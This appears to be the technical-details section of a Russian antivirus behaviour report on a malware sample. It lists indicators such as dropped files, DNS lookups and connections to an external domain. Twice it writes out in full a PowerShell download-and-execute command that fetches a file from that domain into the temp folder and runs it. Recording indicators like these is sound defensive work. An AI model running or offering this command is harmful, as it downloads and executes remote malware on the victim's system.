Техническая информация
- http://indovisual.co.id/system/helper/json/fcbk.mdk как %temp%\hgtjx.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://indovisual.co.id/system/helper/json/fcbk.mdk','%TMP%\hgtjx.exe');Start-Process '%TMP%\hgtjx.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1900
- %TEMP%\1217931.cvr
- 'in####sual.co.id':80
- 'in####sual.co.id':443
- http://in####sual.co.id/system/helper/json/fcbk.mdk
- 'in####sual.co.id':443
- DNS ASK in####sual.co.id
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://indovisual.co.id/system/helper/json/fcbk.mdk','%TMP%\hgtjx.exe');Start-Process '%TMP%\hgtjx.exe';' (со скрытым окном)